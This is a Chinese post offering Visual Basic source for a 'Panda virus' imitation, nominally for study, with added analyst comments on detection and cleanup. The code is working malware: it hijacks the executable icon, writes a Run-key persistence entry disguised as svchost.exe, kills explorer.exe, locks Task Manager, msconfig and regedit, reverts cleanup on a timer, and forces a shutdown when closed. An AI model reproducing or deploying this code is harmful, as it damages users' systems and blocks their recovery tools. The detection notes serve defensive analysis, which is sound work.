VB 打造 熊猫病毒(仅供学习之用)
小诺重要提醒:
仅供学习病毒原理之用。。。。
不要搞恶意破坏,否则真进了监狱后果自负!
====================form的代码如下==================================
' Form-level state shared by the event handlers in this form.
' WIT is a Windows Script Host shell object; the visible code uses it only for
' registry access (RegWrite / RegRead).
Dim WIT As New WshShell
' Scratch string that holds the System or the Windows directory path, depending
' on which helper was called last.
Dim s As String
' WMI service object, the Win32_Process query result and the loop variable
' used by Form_Load to walk the process list.
Dim objWMIService As Object
Dim colProcessList
Dim objProcess As Object
' kernel32 imports used by Form_Load to end a process by its process ID.
' Analyst note: OpenProcess followed by TerminateProcess against the shell
' (explorer.exe) from an unsigned user-mode binary is a useful behavioural
' detection signal.
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
' Runs once when the form loads. In order, it:
'   1. overwrites the default icon shown for .exe files,
'   2. registers an autostart (Run) entry,
'   3. terminates and relaunches explorer.exe,
'   4. opens taskmgr.exe, msconfig.exe and regedit.exe as files and leaves them open.
' Analyst summary of host artefacts visible in this routine:
'   - HKEY_CLASSES_ROOT\exefile\DefaultIcon\ (default value) set to <app dir>\setup.ico
'   - HKEY_LOCAL_MACHINE\...\CurrentVersion\Run value "kav" = <app dir>\svchost.exe
' Cleanup therefore means deleting the "kav" Run value and restoring the
' exefile DefaultIcon default value (on stock Windows this is "%1").
Private Sub Form_Load()
' Every runtime error from here on is silently ignored, so any step below may
' have failed without a trace.
On Error Resume Next
' Trailing backslash = write the key's default value. This changes the icon
' Explorer shows for executables to setup.ico next to this program.
Call WIT.RegWrite("HKEY_CLASSES_ROOT\exefile\DefaultIcon\", App.path & "\setup.ico", "REG_SZ")
' Persistence: a machine-wide Run entry named "kav" pointing at a file called
' svchost.exe in the application's own folder. A svchost.exe image outside the
' Windows system directory is a standard masquerading indicator to hunt for.
Call WIT.RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav", App.path & "\svchost.exe", "REG_SZ")
s = GetSystemPath()
' NOTE(review): the security-settings part of this WMI moniker looks truncated.
' If GetObject fails, the error is swallowed by On Error Resume Next and the
' process loop below may never run - confirm in a sandbox.
Set objWMIService = GetObject("winmgmts:{impers}!\\.\root\cimv2")
Set colProcessList = objWMIService.ExecQuery("select * FROM Win32_Process")
' Despite its name, mProcID receives the handle returned by OpenProcess.
Dim mProcID As Long
For Each objProcess In colProcessList
If LCase(Trim(objProcess.Name)) = "explorer.exe" Then
' 1& is the requested access mask (PROCESS_TERMINATE in the Win32 headers).
mProcID = OpenProcess(1&, -1&, objProcess.ProcessID)
' Forcibly terminate the process. (The original comment said "test"; the
' name compared above is explorer.exe.) The handle is never closed here.
TerminateProcess mProcID, 0&
End If
Next
' Relaunch the shell - presumably so the new .exe icon takes effect; confirm.
Shell GetWindowsPath() & "\explorer.exe"
' Open the system tools as binary files and never Close them. Presumably the
' intent is to hold the files open so the tools are harder to start while this
' program runs - TODO confirm the sharing mode VB applies here.
Open s & "\taskmgr.exe" For Binary As #1
Open s & "\msconfig.exe" For Binary As #3
s = GetWindowsPath()
Open s & "\regedit.exe" For Binary As #2
End Sub
' Runs when the form is being closed. It re-applies the same two registry
' values written by Form_Load, opens the three system tools as files again,
' and then starts a system shutdown.
' Unlike Form_Load there is no On Error statement in this routine.
' NOTE(review): file numbers #1-#3 are the ones Form_Load already used and never
' closed; whether these Open calls succeed at this point is not clear from the
' code shown - confirm.
Private Sub Form_Unload(Cancel As Integer)
' Re-assert the .exe icon override and the "kav" Run entry.
Call WIT.RegWrite("HKEY_CLASSES_ROOT\exefile\DefaultIcon\", App.path & "\setup.ico", "REG_SZ")
Call WIT.RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav", App.path & "\svchost.exe", "REG_SZ")
s = GetSystemPath()
Open s & "\taskmgr.exe" For Binary As #1
Open s & "\msconfig.exe" For Binary As #3
s = GetWindowsPath()
Open s & "\regedit.exe" For Binary As #2
' Closing the window triggers "shutdown -s". Analyst note: shutdown.exe spawned
' by a non-system parent process is worth alerting on.
Shell "shutdown -s", vbNormalFocus
End Sub
' Timer tick handler that restores the program's registry changes if they are
' undone. It reads the default value of exefile\DefaultIcon and, when that no
' longer equals <app dir>\setup.ico, rewrites both the icon override and the
' "kav" Run entry and opens the three system tools as files again.
' Note that the Run entry is only rewritten when the icon value has changed;
' the Run value itself is never read here.
' Analyst note: because of this loop, manual registry cleanup is reverted while
' the process is alive - stop the process before cleaning the registry.
Private Sub Timer1_Timer()
If WIT.RegRead("HKEY_CLASSES_ROOT\exefile\DefaultIcon\") <> App.path & "\setup.ico" Then
Call WIT.RegWrite("HKEY_CLASSES_ROOT\exefile\DefaultIcon\", App.path & "\setup.ico", "REG_SZ")
Call WIT.RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav", App.path & "\svchost.exe", "REG_SZ")
s = GetSystemPath()
Open s & "\taskmgr.exe" For Binary As #1
Open s & "\msconfig.exe" For Binary As #3
s = GetWindowsPath()
Open s & "\regedit.exe" For Binary As #2
End If
End Sub
=================================Module1代码如下==================================
' Module-level constants and Win32 imports.
' The SND_* values and SW_SHOWNORMAL are not referenced by any code shown on
' this page.
Public Const SND_SYNC = &H0
Public Const SND_ASYNC = &H1
Public Const SND_NODEFAULT = &H2
Public Const SND_MEMORY = &H4
Public Const SND_LOOP = &H8
Public Const SND_NOSTOP = &H10
Public Const SW_SHOWNORMAL = 1
' Get the system directory (called by GetSystemPath).
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
' Get the Windows directory (called by GetWindowsPath).
Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
' The three imports below are declared but not called in the code shown here.
Public Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Public Declare Function fCreateShellLink Lib "STKIT432.DLL" (ByVal lpstrFolderName As String, ByVal lpstrLinkName As String, ByVal lpstrLinkPath As String, ByVal lpstrLinkArgs As String) As Long
Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
' Returns the system directory path reported by GetSystemDirectory.
' The API writes into a fixed 80-character buffer and returns a length; the
' function result is that many leading characters of the buffer.
' NOTE(review): a path that does not fit in 80 characters is not handled - confirm.
Public Function GetSystemPath() As String
    Dim buf As String * 80
    Dim written As Long
    written = GetSystemDirectory(buf, Len(buf))
    GetSystemPath = Left(buf, written)
End Function
' Returns the Windows directory path reported by GetWindowsDirectory.
' The API writes into a fixed 80-character buffer and returns a length; the
' function result is that many leading characters of the buffer.
' NOTE(review): a path that does not fit in 80 characters is not handled - confirm.
Public Function GetWindowsPath() As String
    Dim buf As String * 80
    Dim written As Long
    written = GetWindowsDirectory(buf, Len(buf))
    GetWindowsPath = Left(buf, written)
End Function
'用户信息